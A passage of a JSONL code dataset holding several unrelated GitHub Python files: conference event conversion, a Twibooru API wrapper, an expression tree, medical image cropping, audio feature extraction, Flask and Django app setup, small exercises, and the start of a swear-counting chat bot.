Channel'],\n \"channel_url\": orig_csv['Channel URL'],\n})\n\nnew_tut_csv = pd.DataFrame({\n \"UID\": tut_csv['Event number (UTC)'],\n \"title\": [s.split(':')[0][:-1] + ': ' + s.split(':')[1] if ':' in s else s for s in tut_csv['Title']],\n \"day\": tut_csv['Conf day'],\n \"start_date\": tut_csv['Date (UTC)'],\n \"start_time\": tut_csv['Start time (UTC)'],\n \"start_date_b\": tut_csv['start_date_b'],\n \"start_time_b\": tut_csv['start_time_b'],\n \"category\": tut_csv['Category'],\n \"description\": tut_csv['Description'],\n \"organiser\": tut_csv['Organiser'],\n \"web_link\": tut_csv['Website link'],\n \"slack_channel\": tut_csv['Slack Channel'],\n \"channel_url\": tut_csv['Channel URL'],\n})\n\nwith open('../static/calendar/ISMIR_2020.ics', 'wb') as f:\n f.write(cal.to_ical())\n\nnew_csv.to_csv('../sitedata/events.csv', index=False)\nnew_tut_csv.to_csv('../sitedata/tutorials_all.csv', index=False)\n# print(cal)\n# print(events_meta)\n","repo_name":"DDMAL/ISMIR-Conf","sub_path":"scripts/convert_all_events.py","file_name":"convert_all_events.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25493599337","text":"from .request import get_galleries, url_galleries\nfrom .gallery import Gallery\nfrom .helpers import api_key, join_params, set_limit, sort_format_galleries\n\n__all__ = [\n \"Galleries\"\n]\n\nclass Galleries(object):\n \"\"\"\n All properties are read-only, and every method returns a new instance of\n Galleries() to avoid mutating state in ongoing search queries. This makes object\n interactions predictable as well as making versioning of searches relatively\n easy.\n \"\"\"\n def __init__(self, title=\"\", description=\"\", include_image=None,\n sf=\"created_at\", sd=\"desc\", user=\"\",\n key=\"\", limit=50, perpage=25, page=1,\n url_domain=\"https://twibooru.org\", proxies={}):\n \"\"\"\n By default initializes an instance of Galleries with the parameters to get\n the first 25 galleries on Twibooru's galleries page.\n \"\"\"\n self.proxies = proxies\n self.url_domain = url_domain\n self._params = {\n \"key\": api_key(key),\n \"title\": title,\n \"description\": description,\n \"include_image\": set_limit(include_image),\n \"sf\": sort_format_galleries(sf),\n \"sd\": sd,\n \"perpage\": set_limit(perpage),\n \"page\": set_limit(page),\n \"user\": user,\n }\n self._limit = set_limit(limit)\n self._search = get_galleries(self._params, self._limit,\n url_domain=self.url_domain, proxies=self.proxies)\n \n def __iter__(self):\n \"\"\"\n Make Galleries() iterable so that new search results can be lazily generated\n for performance reasons.\n \"\"\"\n return self\n\n @property\n def parameters(self):\n \"\"\"\n Returns a list of available parameters; useful for passing state to new\n instances of Galleries().\n \"\"\"\n return self._params\n\n @property\n def url(self):\n \"\"\"\n Returns a search URL built on set parameters. Example based on default\n parameters:\n\n https://twibooru.org/galleries?title=*&description=&creator=&include_image=&sf=created_at&sd=desc\n \"\"\"\n return url_galleries(self.parameters, url_domain=self.url_domain)\n\n def key(self, key=\"\"):\n \"\"\"\n Takes a user's API key string which applies content settings. API keys can\n be found at <https://twibooru.org/registration/edit>.\n \"\"\"\n params = join_params(self.parameters, {\"key\": key,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def title(self, title=\"\"):\n \"\"\"\n Takes string for searching by title.\n \"\"\"\n params = join_params(self.parameters, {\"title\": title,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def description(self, description=\"\"):\n \"\"\"\n Takes string for searching by description.\n \"\"\"\n params = join_params(self.parameters, {\"description\": description,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def include_image(self, include_image=None):\n \"\"\"\n Takes image ID for searching by include image.\n \"\"\"\n params = join_params(self.parameters, {\"include_image\": include_image,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def user(self, user=\"\"):\n \"\"\"\n Takes string for searching by user.\n \"\"\"\n params = join_params(self.parameters, {\"user\": user,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def sort_by(self, sf):\n \"\"\"\n Determines how to sort search results. Available sorting methods are\n sort.SCORE, sort.COMMENTS, sort.HEIGHT, sort.RELEVANCE, sort.CREATED_AT,\n and sort.RANDOM; default is sort.CREATED_AT.\n \"\"\"\n params = join_params(self.parameters, {\"sf\": sf,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def descending(self):\n \"\"\"\n Order results from largest to smallest; default is descending order.\n \"\"\"\n params = join_params(self.parameters, {\"sd\": \"desc\",\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def ascending(self, sd=\"asc\"):\n \"\"\"\n Order results from smallest to largest; default is descending order.\n \"\"\"\n params = join_params(self.parameters, {\"sd\": sd,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def limit(self, limit):\n \"\"\"\n Set absolute limit on number of galleries to return, or set to None to return\n as many results as needed; default 50 galleries. This limit on app-level.\n \"\"\"\n params = join_params(self.parameters, {\"limit\": limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies})\n\n return self.__class__(**params)\n\n def get_page(self,page):\n \"\"\"\n Set page for gets result of search.\n \"\"\"\n params = join_params(self.parameters, {\"page\": set_limit(page),\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def perpage(self,limit):\n \"\"\"\n Set absolute limit on number of galleries to get, or set to None to return\n defaulting 25 galleries; max 50 galleries. This limit on API-level.\n \"\"\"\n params = join_params(self.parameters, {\"perpage\": set_limit(limit),\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def __next__(self):\n \"\"\"\n Returns a result wrapped in a new instance of Gallery().\n \"\"\"\n return Gallery(next(self._search), search_params=self.parameters,\n url_domain=self.url_domain, proxies=self.proxies)","repo_name":"Atronar/Twibooru-Py","sub_path":"twibooru/galleries.py","file_name":"galleries.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10564718077","text":"import LinkedBinaryTree\n\nclass ExpressionTree(LinkedBinaryTree):\n \"\"\"\n An arithmetic expression tree\n \"\"\"\n\n def __init__(self, token, left=None, right=None):\n \"\"\"\n Create an expression tree.\n\n In single parameter form, token should be a leaf value, aka a number and the expression tree will have\n that value at an isolated node\n\n In a three-parameter version, token should be an operator,\n and left and right should be existing ExpressionTree instances\n that become the operands for the binary operator\n :param token:\n :param left:\n :param right:\n \"\"\"\n\n super().__init__()\n if not isinstance(token, str):\n raise TypeError('Token must be a string')\n self._add_root(token)\n if left is not None:\n if token not in '+-*/':\n raise ValueError('token must be valid operator')\n self._attach(self.root(), left, right)\n\n def __str__(self):\n pieces = []\n self._parenthesize_recur(self.root(), pieces)\n return ''.join(pieces)\n\n def _parenthesize_recur(self, p, result):\n if self.is_leaf(p):\n result.append(str(p.element()))\n else:\n result.append('(')\n self._parenthesize_recur(self.left(p), result)\n result.append(p.element())\n self._parenthesize_recur(self.right(p), result)\n\n","repo_name":"MadTown86/data_structures_learn","sub_path":"ExpressionTree.py","file_name":"ExpressionTree.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1187372702","text":"#########################################\r\n# i01_pir_stop.py\r\n# categories: inmoov2\r\n# more info @: http://myrobotlab.org/service/InMoov\r\n#########################################\r\n# uncomment for virtual hardware\r\n# Platform.setVirtual(True)\"\r\n\r\n# stop a pir\r\nRuntime.releaseService('i01.pir')\r\ni01.speakBlocking(i01.localize(\"STOPPIR\"))\r\nisPirActivated=False","repo_name":"InnovativeDigitalSolution/Robotic","sub_path":"resource/InMoov2/system/startScripts/i01_pir_stop.py","file_name":"i01_pir_stop.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5168371014","text":"import numpy as np \nfrom PIL import Image\nimport os\nimport scipy.misc\n\ndef vote_mask(imagespath,startstr):\n imgpaths = os.listdir(imagespath)\n for imgname in imgpaths:\n if imgname.startswith(startstr):\n imgpath = os.path.join(imagespath,imgname)\n images = np.array(Image.open(imgpath).convert('L'),dtype=np.float32)\n images = np.expand_dims(images,axis=0)\n\n\n for imgname in imgpaths:\n if imgname.startswith(startstr):\n imgpath = os.path.join(imagespath,imgname)\n img = np.array(Image.open(imgpath).convert('L'),dtype=np.float32)\n img = np.expand_dims(img,axis=0)\n images = np.concatenate((images, img), axis=0)\n\n images = images[1:]/255.0\n N = images.shape[0]\n M = int(N/3)\n image = np.sum(images,axis=0)\n image[image<M]=0\n image[image>=M]=1\n image = np.array(image,dtype=np.uint8)\n return image\n\t\t\t\t\n\n\n# def get_min_area_rect(image):\n# # img = np.array(np.array(Image.open(impath))>0,dtype=np.uint8)\n# itemindex = np.argwhere(image == 1)\n# rect = cv2.minAreaRect(itemindex) \n# box = cv2.boxPoints(rect) \n# return box\n \ndef get_area_rect(img):\n itemindex = np.argwhere(img == 1)\n X = itemindex[:,0]\n Y = itemindex[:,1]\n minX,maxX = np.min(X), np.max(X)\n minY,maxY = np.min(Y), np.max(Y)\n size = [maxX - minX + 1,maxY - minY + 1]\n box = [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]]\n return box,size\n\ndef get_area_fixed_size(box,size):\n eh,ew = 100,100\n if size[0] <= eh and size[1] <= ew:\n hight = eh\n weight = ew\n pad_weight1 = int((weight - size[1])/2)\n pad_weight2 = weight - size[1] - pad_weight1\n pad_hight1 = int((hight - size[0])/2)\n pad_hight2 = hight - size[0] - pad_hight1\n elif size[0] > eh and size[1] <= ew:\n print(\"#######################>80or<64#######################################\")\n print(size[0],size[1])\n weight = ew\n pad_weight1 = int((weight - size[1])/2)\n pad_weight2 = weight - size[1] - pad_weight1\n pad_hight1 = 0\n pad_hight2 = 0\n elif size[0] < eh and size[1] > ew:\n print(\"#######################<80or>64#######################################\")\n print(size[0],size[1])\n hight = eh\n pad_weight1 = 0\n pad_weight2 = 0\n pad_hight1 = int((hight - size[0])/2)\n pad_hight2 = hight - size[0] - pad_hight1\n elif size[0] > eh and size[1] > ew:\n print(\"#######################>80or>64#######################################\")\n print(size[0],size[1])\n pad_weight1 = 0\n pad_weight2 = 0\n pad_hight1 = 0\n pad_hight2 = 0\n [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]] = box\n minX = minX - pad_hight1\n maxX = maxX + pad_hight2\n minY = minY - pad_weight1\n maxY = maxY + pad_weight2\n size = [maxX - minX + 1,maxY - minY + 1]\n box = [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]]\n # print(minX,maxX,minY,maxY)\n return box,size\n\n\n\n#######################################\ndef crop_spinal_area_rect(imgpath,lblpath,maskpredpath,imagesavepath,masksavepath,logfile,startstr):#filepath,\n print(startstr)\n imgList = os.listdir(imgpath)\n maskList= os.listdir(lblpath)\n image = vote_mask(maskpredpath,startstr)\n box,size = get_area_rect(image)\n box,size = get_area_fixed_size(box,size)\n\n for imgname in imgList:\n if imgname.startswith(startstr):\n image = Image.open(os.path.join(imgpath,imgname)).convert('L')\n image = np.array(image, dtype=np.float32)\n img_top, img_left = box[1][0]-1, box[1][1]-1\n th, tw = size[0],size[1]\n # print(th,tw)\n imagecontainer = np.zeros((size[0], size[1]), np.float32)\n imagecontainer = image[img_top:img_top+th, img_left:img_left+tw]\n scipy.misc.imsave(os.path.join(imagesavepath,imgname),imagecontainer)\n\n for maskname in maskList:\n if maskname.startswith(startstr):\n mask = Image.open(os.path.join(lblpath,maskname)).convert('L')\n mask = np.array(mask, dtype=np.uint8)\n img_top, img_left = box[1][0]-1, box[1][1]-1\n th, tw = size[0],size[1]\n # print(th,tw)\n maskcontainer = np.zeros((size[0], size[1]), np.float32)\n maskcontainer = mask[img_top:img_top+th, img_left:img_left+tw]\n\n [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]] = box\n line = str(maskname)+' '+\"[[\"+str(minX)+','+str(maxY)+\"],[\"+str(minX)+','+str(minY)+\"],[\"+str(maxX)+\",\"+str(minY)+\"],[\"+str(maxX)+','+str(maxY)+\"]]\\n\"\n with open(logfile,'a+') as logf: \n logf.write(line)\n \n scipy.misc.imsave(os.path.join(masksavepath,maskname), maskcontainer)\n\nimgpath = \"/home/jjchu/DataSet/spinalcord/centercrop_200/image_crop/\"\nlblpath = \"/home/jjchu/DataSet/spinalcord/centercrop_200/mask_crop/\"\nmaskpredpath=\"/home/jjchu/Result/UNet2Results/Real_centercrop200_nclass2_UNet5_kernel7_b8_18/\"\nimagespath = \"/home/jjchu/DataSet/spinalcord/centercrop_200/image_crop/\"\nimagesavepath = \"/home/jjchu/DataSet/spinalcord/predcrop_100/image_crop/\"\nmasksavepath = \"/home/jjchu/DataSet/spinalcord/predcrop_100/mask_crop/\"\nlogfile = \"/home/jjchu/DataSet/spinalcord/dataprocess/name_cropbox_from_centercrop200.txt\"\n\nfor i in range(3,5):\n for j in range(1,11):\n if j <10:\n startstr = \"site\"+str(i)+'-sc0'+str(j)\n else:\n startstr = \"site\"+str(i)+'-sc'+str(j)\n\n crop_spinal_area_rect(imgpath,lblpath,maskpredpath,imagesavepath,masksavepath,logfile,startstr)","repo_name":"mulanshine/GitHubResearch","sub_path":"DataProcess/find_image_size_by_predmaskvote.py","file_name":"find_image_size_by_predmaskvote.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5969891426","text":"from PySide import QtCore, QtGui\n\n\nclass JSONSyntaxHighlighter(QtGui.QSyntaxHighlighter):\n def __init__(self, parent=None):\n \"\"\" Constructor\n \"\"\"\n super(JSONSyntaxHighlighter, self).__init__(parent)\n\n self.symbol_format = QtGui.QTextCharFormat()\n self.symbol_format.setForeground(QtCore.Qt.red)\n self.symbol_format.setFontWeight(QtGui.QFont.Bold)\n\n self.name_format = QtGui.QTextCharFormat()\n self.name_format.setForeground(QtCore.Qt.blue)\n self.name_format.setFontWeight(QtGui.QFont.Bold)\n self.name_format.setFontItalic(True)\n\n self.value_format = QtGui.QTextCharFormat()\n self.value_format.setForeground(QtCore.Qt.darkGreen)\n\n def highlightBlock(self, text):\n \"\"\" Highlight a block of code using the rules outlined in the Constructor\n \"\"\"\n expression = QtCore.QRegExp(\"(\\\\{|\\\\}|\\\\[|\\\\]|\\\\:|\\\\,)\")\n index = expression.indexIn(text)\n while index >= 0:\n length = expression.matchedLength()\n self.setFormat(index, length, self.symbol_format)\n index = expression.indexIn(text, index + length)\n\n text.replace(\"\\\\\\\"\", \" \")\n\n expression = QtCore.QRegExp(\"\\\".*\\\" *\\\\:\")\n expression.setMinimal(True)\n index = expression.indexIn(text)\n while index >= 0:\n length = expression.matchedLength()\n self.setFormat(index, length - 1, self.name_format)\n index =expression.indexIn(text, index + length)\n\n expression = QtCore.QRegExp(\"\\\\: *\\\".*\\\"\")\n expression.setMinimal(True)\n index = expression.indexIn(text)\n while index >= 0:\n length = expression.matchedLength()\n self.setFormat(index, length - 1, self.value_format)\n index = expression.indexIn(text, index + length)\n","repo_name":"slohmaier/JsonRPCTester","sub_path":"jsonrpctester/json_syntax_highlighter.py","file_name":"json_syntax_highlighter.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13494937770","text":"from django.urls import path\nfrom apis.views.jobpost_views import (\n JobPostRegistrationView,\n JobPostUpdateView,\n JobPostRetrieveView,\n JobPostDeleteView,\n JobPostReadView,\n)\nfrom apis.views.apply_views import ApplyView, ApplyDeleteView\n\n\napp_name = \"apis\"\n\nurlpatterns = [\n path(\"\", JobPostReadView.as_view(), name=\"jobpost_read\"),\n path(\n \"registration/\", JobPostRegistrationView.as_view(), name=\"jobpost_registration\"\n ),\n path(\"update/<int:pk>/\", JobPostUpdateView.as_view(), name=\"jobpost_update\"),\n path(\"delete/<int:pk>/\", JobPostDeleteView.as_view(), name=\"jobpost_delete\"),\n path(\"<int:pk>/\", JobPostRetrieveView.as_view(), name=\"jobpost_retrieve\"),\n path(\"apply/\", ApplyView.as_view(), name=\"job_apply\"),\n path(\"apply/<int:pk>/\", ApplyDeleteView.as_view(), name=\"job_apply_delete\"),\n]\n","repo_name":"Jungminchae/wanted_pre_onboarding","sub_path":"app/apis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19926114404","text":"#!/usr/bin/python3\n\"\"\" Creates an app instance \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import Flask, make_response, jsonify\nfrom flask_cors import CORS\nfrom os import getenv\nfrom models import storage\n\n\napp = Flask(__name__)\napp.register_blueprint(app_views)\nCORS(app, resources={r\"/*\": {\"origins\": \"0.0.0.0\"}})\n\n\n@app.teardown_appcontext\ndef teardown_session(exception):\n \"\"\"teardown session\"\"\"\n storage.close()\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({\"error\": \"Not found\"}), 404)\n\n\nif __name__ == '__main__':\n host = getenv('HBNB_API_HOST')\n port = getenv('HBNB_API_PORT')\n\n if not host and not port:\n host = '0.0.0.0'\n port = 5000\n\n app.run(host=host, port=port, threaded=True)\n","repo_name":"Gfry1234/AirBnB_clone_v3","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25114594481","text":"# prepare text and audio_train for use in neural network models\nimport math\nimport os\nimport random\nimport sys\nfrom collections import OrderedDict\n\nimport pandas as pd\nimport numpy as np\nimport torch\nfrom pprint import pprint\nfrom torch import nn\nfrom torch.utils.data import Dataset\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.utils.class_weight import compute_class_weight\nfrom fairseq.models.wav2vec import Wav2VecModel\nfrom sklearn.preprocessing import MinMaxScaler\nimport torchaudio\n\nimport statistics\n\n# classes\nfrom torch.utils.data.sampler import RandomSampler\n\nclass GetFeatures:\n \"\"\"\n Takes input files and gets segmental and/or suprasegmental features\n Current features extracted: XXXX, YYYY, ZZZZ\n \"\"\"\n def __init__(self, audio_path, opensmile_path, save_path):\n self.apath = audio_path\n self.smilepath = opensmile_path\n self.savepath = save_path\n self.supra_name = None # todo: delete?\n self.segment_name = None # todo: delete?\n\n #\n # def copy_files_to_single_directory(self, single_dir_path):\n # \"\"\"\n # Copy all files for different speakers to a single directory\n # single_dir_path : full path\n # \"\"\"\n # if not os.path.isdir(single_dir_path):\n # os.system(\"mkdir {0}\".format(single_dir_path))\n # # for f in os.scandir(self.apath):\n # # if f.is_dir() and str(f).startswith(\"S\"):\n # # print(f)\n # os.system(\"cp -r {0}/S*/wav/* {2}/\".format(self.apath, single_dir_path))\n # self.apath = single_dir_path\n\n def extract_features(self, supra=False, summary_stats=False):\n \"\"\"\n Extract the required features in openSMILE\n \"\"\"\n # for file in directory\n for f in os.listdir(self.apath):\n # get all wav files\n if f.endswith('.wav'):\n wavname = f.split('.')[0]\n # extract features\n # todo: replace config files with the appropriate choice\n if supra is True:\n os.system(\"{0}/SMILExtract -C {0}/config/IS10_paraling.conf -I {1}/{2}\\\n -lldcsvoutput {3}/{4}.csv\".format(self.smilepath, self.apath, f,\n self.savepath, wavname))\n # self.supra_name = output_name # todo: delete?\n else:\n if summary_stats is False:\n os.system(\"{0}/SMILExtract -loglevel 0 -C {0}/config/IS09_emotion.conf -I {1}/{2}\\\n -csvoutput {3}/{4}.csv\".format(self.smilepath, self.apath, f,\n self.savepath, wavname))\n else:\n os.system(\"{0}/SMILExtract -loglevel 0 -C {0}/config/IS10_paraling.conf -I {1}/{2}\\\n -csvoutput {3}/{4}.csv\".format(self.smilepath, self.apath, f,\n self.savepath, wavname))\n # self.segment_name = output_name # todo: delete?\n\n def get_features_dict(self, dropped_cols=None):\n \"\"\"\n Get the set of phonological/phonetic features\n \"\"\"\n # create a holder for features\n feature_set = {}\n feature_length = {}\n scaler = MinMaxScaler()\n # iterate through csv files created by openSMILE\n for csvfile in os.listdir(self.savepath):\n if csvfile.endswith('.csv'):\n csv_name = csvfile.split(\".\")[0]\n # get data from these files\n csv_data = pd.read_csv(\"{0}/{1}\".format(self.savepath, csvfile), sep=';')\n time_length = csv_data.shape[0]\n\n # drop name and time frame, as these aren't useful\n if dropped_cols:\n csv_data = self.drop_cols(csv_data, dropped_cols)\n else:\n csv_data = csv_data.drop(['name', 'frameTime'], axis=1).to_numpy().tolist()\n # csv_data = pd.DataFrame(scaler.fit_transform(csv_data), columns=csv_data.columns).to_numpy().tolist()\n if \"nan\" in csv_data or \"NaN\" in csv_data or \"inf\" in csv_data:\n pprint.pprint(csv_data)\n print(\"Data contains problematic data points\")\n sys.exit(1)\n\n # add it to the set of features\n # feature_set[csv_name] = csv_data\n feature_set[csv_name] = np.mean(csv_data, axis=0)\n feature_length[csv_name] = 1\n\n # if time_length <= 686:\n #\n # target_data = np.zeros((686, 32))\n # target_data[:time_length, :] = np.array(csv_data)\n #\n # feature_set[csv_name] = target_data\n # feature_length[csv_name] = time_length\n # else:\n # diff = time_length - 686\n #\n # random_start = np.random.randint(0, diff + 1)\n # end = time_length - diff + random_start\n # extracted_data = np.array(csv_data)[random_start:end, :]\n #\n # feature_set[csv_name] = extracted_data\n # feature_length[csv_name] = 686\n\n return feature_set, feature_length\n\n def drop_cols(self, dataframe, to_drop):\n \"\"\"\n to drop columns from pandas dataframe\n used in get_features_dict\n \"\"\"\n return dataframe.drop(to_drop, axis=1).to_numpy().tolist()\n\n # def get_select_cols(self, cols):\n # \"\"\"\n # If you happen to use a conf file that results in too much data\n # and want to clean it up, select only the columns you want.\n # suprafile: the path to a csv file containing results\n # cols: an array of columns that you want to select\n # Returns data as an np array\n # \"\"\"\n # suprafile = \"{0}/{1}.csv\".format(self.apath, self.supra_name)\n # supras = pd.read_csv(suprafile, sep=',')\n # try:\n # return supras[cols]\n # except:\n # for col in cols:\n # if col not in supras.columns:\n # cols.remove(col)\n # return supras[cols].to_numpy()\n\ndef make_w2v_dict(audio_path=\"\", wav_names=[], rnn=False):\n # list_wavs = wav_names\n\n audio_dict = {}\n audio_length = {}\n\n for wav_name in wav_names:\n torch_file = wav_name + \".pt\"\n\n # print(wav_name)\n filename = os.path.join(audio_path, torch_file)\n\n aggregated_feat = torch.load(filename)\n\n mel_time = aggregated_feat.size()[2]\n\n if rnn:\n if mel_time > 980:\n target_tensor = aggregated_feat[:, :, :980]\n audio_length[wav_name] = 980\n else:\n target_tensor = aggregated_feat\n audio_length[wav_name] = mel_time\n\n else:\n if mel_time <= 980:\n target_tensor = torch.zeros(1, 512, 980)\n target_tensor[:, :, :mel_time] = aggregated_feat\n audio_length[wav_name] = mel_time\n else:\n # target_tensor = torch.zeros(1, 512, 686)\n\n diff = mel_time - 980\n\n random_start = np.random.randint(0, diff + 1)\n end = mel_time - diff + random_start\n\n target_tensor = aggregated_feat[:, :, random_start:end]\n\n audio_length[wav_name] = 980\n\n audio_dict[wav_name] = target_tensor.squeeze(0)\n\n return audio_dict, audio_length\n\n\ndef make_acoustic_dict(audio_path, wav_names, rnn):\n # get wav names\n\n audio_dict = {}\n\n audio_length = {}\n for wav_name in wav_names:\n audio = wav_name + \".wav\"\n if (\".wav\") in audio:\n audio_name = audio.replace(\".wav\", \"\")\n filename = os.path.join(audio_path, audio)\n\n waveform, sample_rate = torchaudio.load(filename, normalization=True)\n\n # get mel_spectrogram\n mel_spectrogram = torchaudio.transforms.MelSpectrogram(sample_rate,\n hop_length=256,\n n_mels=96,\n n_fft=256,\n pad=0)(waveform)\n # get mfcc\n mfcc = torchaudio.transforms.MFCC(sample_rate, n_mfcc=13,\n melkwargs={\"hop_length\": 256, \"n_mels\": 96, \"n_fft\": 256})\n mfcc_feature = mfcc.forward(waveform)\n mfcc_delta = torchaudio.transforms.ComputeDeltas().forward(mfcc_feature)\n mfcc_delta_delta = torchaudio.transforms.ComputeDeltas().forward(mfcc_delta)\n\n ### Choose feature to use (mel_spec = 1, 96, X, mfcc = 1, mfcc, X)\n # concat_feature = torch.cat((mel_spectrogram, mfcc_feature, mfcc_delta, mfcc_delta_delta), dim=1)\n concat_feature = torch.cat((mfcc_feature, mfcc_delta, mfcc_delta_delta), dim=1)\n # concat_feature = mel_spectrogram\n\n if rnn:\n ### For RNN, clip the audio_train if it's longer than 596\n ### Else, just use it as it is\n mel_time = concat_feature.size()[2]\n feat_size = concat_feature.size()[1]\n if mel_time > 686:\n diff = mel_time - 686\n\n random_start = np.random.randint(0, diff + 1)\n end = mel_time - diff + random_start\n target_tensor = concat_feature[:1, :feat_size, random_start:end]\n audio_length[audio_name] = 686\n else:\n target_tensor = concat_feature\n audio_length[audio_name] = mel_time\n\n audio_dict[audio_name] = target_tensor\n else:\n ### For CNN, clip the audio_train if it's longer than 596\n ### Else, zero-padding\n mel_time = mel_spectrogram.size()[2]\n feat_size = concat_feature.size()[1]\n\n target_tensor = torch.zeros(1, feat_size, 686)\n\n if mel_time > 686:\n\n diff = mel_time - 686\n\n random_start = np.random.randint(0, diff + 1)\n end = mel_time - diff + random_start\n target_tensor = concat_feature[:1, :feat_size, random_start:end]\n audio_length[audio_name] = 686\n else:\n target_tensor[:, :, :mel_time] = concat_feature\n audio_length[audio_name] = mel_time\n\n audio_dict[audio_name] = target_tensor\n\n return audio_dict, audio_length\n\ndef get_phonological_features(setpath):\n \"\"\"\n Get the phonological features from a csv file\n \"\"\"\n phon_dict = {}\n with open(setpath, 'r') as phonfile:\n phondata = phonfile.readlines()\n for i in range(1, len(phondata)):\n # print(phondata[i])\n line = phondata[i].rstrip().split(',')\n wav_name = line[0].split('.')[0]\n data = np.array(line[1:], dtype=np.float32)\n phon_dict[wav_name] = data\n return phon_dict\n\n","repo_name":"seongjinpark-88/proficiency_judgment","sub_path":"data_prep/data_prep_helpers.py","file_name":"data_prep_helpers.py","file_ext":"py","file_size_in_byte":11396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75300046568","text":"\"\"\"Store configuration.\"\"\"\n\n__all__ = [\"PATH\"]\n\nimport pathlib\n\nhome = pathlib.Path.home()\ncwd = pathlib.Path.cwd()\ncwd_config = cwd / \"config.yml\"\n\nmodule_path = pathlib.Path(__file__).parent.absolute()\nrepo_path = module_path.parent\n\n\nclass Path:\n module = module_path\n repo = repo_path\n lyp = module_path / \"klayout\" / \"sky130ph\" / \"layers.lyp\"\n sparameters = module_path / \"sparameters\"\n\n\nPATH = Path()\n\nif __name__ == \"__main__\":\n print(PATH)\n","repo_name":"BYUCamachoLab/sky130ph","sub_path":"sky130ph/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13276716857","text":"# Faça um programa que tenha uma função chamada área(), \n# que receba as dimensões de um terreno retangular (largura e comprimento) \n# e mostre a área do terreno:\n\ndef area (b, h):\n multiplicar = b*h\n print(f'O Valor da área é {multiplicar} m².')\n\nprint(\" Calculo de área\")\nprint()\nb = (float(input(\"Informe o valor da base: \")))\nh = (float(input(\"Informe o valor da altura: \")))\narea(b,h)\n","repo_name":"SteffanySympson/BLUE-MOD-1","sub_path":"Exercícios/Exercício de Função - 1 - Área.py","file_name":"Exercício de Função - 1 - Área.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5811985799","text":"# Задача-4: Дан список, заполненный произвольными целыми числами.\n# Получите новый список, элементами которого будут:\n# а) неповторяющиеся элементы исходного списка:\n# например, lst = [1, 2, 4, 5, 6, 2, 5, 2], нужно получить lst2 = [1, 2, 4, 5, 6]\n# б) элементы исходного списка, которые не имеют повторений:\n# например, lst = [1 , 2, 4, 5, 6, 2, 5, 2], нужно получить lst2 = [1, 4, 6]\n\nimport random\n\nn = int(input('Введите число: '))\nx = []\nfor i in range(0, n):\n x.append( random.randint(0, 6))\nprint(x)\n\nnew_list = []\nnew_list_2 = []\nk = 0\nfor i in range(len(x)-1):\n for j in range(i+1,len(x)):\n if x[i] == x[j]:\n k += 1\n if k == 1:\n new_list.append(x[i])\n k = 0\nprint(new_list)","repo_name":"BocheVskiy/HW_normal","sub_path":"hw03_normal_4.py","file_name":"hw03_normal_4.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18071682207","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nfrom stats import Stats, MemberException\n\nclass SwearBot():\n\n def __init__(self, stats_, config):\n self.config = config\n self.stats_ = stats_\n self.swear_words = self.build_swear_list()\n\n def on_message(self, msg):\n text = msg.content.lower()\n try:\n count = sum((text.count(word) for word in self.swear_words))\n if count > 0:\n self.stats_[msg.author.name][\"sproste zpravy\"] += 1\n 